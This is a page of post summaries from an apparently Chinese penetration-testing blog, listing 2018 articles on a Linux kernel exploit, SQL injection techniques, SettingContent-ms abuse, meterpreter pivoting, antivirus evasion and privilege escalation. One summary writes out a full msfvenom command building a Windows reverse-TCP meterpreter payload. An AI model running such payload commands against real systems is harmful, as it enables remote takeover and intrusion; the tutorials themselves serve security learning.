上一页 1 ··· 33 34 35 36 37 38 39 40 41 ··· 47 下一页
摘要: 0x01 漏洞前言 Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16到4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。由白帽黑客Jann Horn发现,内核漏洞(CVE-2018-17182)是Linux内存管理子系统中 阅读全文
posted @ 2018-09-30 15:38 渗透测试中心 阅读(3953) 评论(0) 推荐(0) 编辑
摘要: 0x00 延迟注入定义 延迟注入,是一种盲注的手法, 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。 阅读全文
posted @ 2018-09-29 02:12 渗透测试中心 阅读(17738) 评论(0) 推荐(0) 编辑
摘要: 0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 s 阅读全文
posted @ 2018-09-29 01:57 渗透测试中心 阅读(29530) 评论(0) 推荐(6) 编辑
摘要: 0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型,它的内容是XML格式进行编写的,主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件,系统并未判断该 阅读全文
posted @ 2018-09-13 18:24 渗透测试中心 阅读(2207) 评论(0) 推荐(0) 编辑
摘要: 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来 阅读全文
posted @ 2018-09-13 18:13 渗透测试中心 阅读(1463) 评论(0) 推荐(0) 编辑
摘要: 0x00 BGP(RFC 1771、 RFC 4271)定义 全称是Border Gateway Protocol, 对应中文是边界网关协议,最新版本是BGPv4。 BGP是互联网上一个核心的互联网去中心化自治路由协议。它的地位是核心的毫不夸张地说, 是目前唯一连接海陆空和7大洲4大洋的外部路由协议 阅读全文
posted @ 2018-08-28 09:50 渗透测试中心 阅读(9969) 评论(1) 推荐(2) 编辑
摘要: 0x00 VPN泄漏本地IP 最近爆出VPN可以被准确地测出浏览者的真实IP地址,这被称为WebRTC特征。只要到这个网页就可以测试你的VPN是否泄露的真实IP。 https://diafygi.github.io/webrtc-ips/ 来示范通过 JS 获取代理用户的真实 IP 地址, 为了大家 阅读全文
posted @ 2018-08-23 10:41 渗透测试中心 阅读(12) 评论(0) 推荐(0) 编辑
摘要: 0x01 meterpreter多级内网代理穿透 1.Pivoting 基本上可以概括为,在正常情况下仅仅只是通过利用被控制的计算机我们可能依旧无法进行网络访问。假设一台被控制的计算机连接有多个网络,将其作为我们的跳板,那么网络隔离的手段对我们来说就形同虚设。跟着这个思路,攻击者在被控制的跳板主机上 阅读全文
posted @ 2018-08-16 03:07 渗透测试中心 阅读(1000) 评论(0) 推荐(0) 编辑
摘要: 0×01 静态检测与对抗 1.静态分析原理 简单的来说,就是通过特征码识别静态文件,杀软会扫描存在磁盘上的镜像文件,如果满足特征码,就识别为恶意软件。 恶意软件匹配规则yara匹配恶意软件的时候就是用的这样的方式。 通过特征来识别抓HASH工具QuarksPwDump,yara规则如下(查看源码) 阅读全文
posted @ 2018-08-16 03:05 渗透测试中心 阅读(2011) 评论(0) 推荐(0) 编辑
摘要: 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe 阅读全文
posted @ 2018-08-16 03:03 渗透测试中心 阅读(32507) 评论(1) 推荐(2) 编辑
上一页 1 ··· 33 34 35 36 37 38 39 40 41 ··· 47 下一页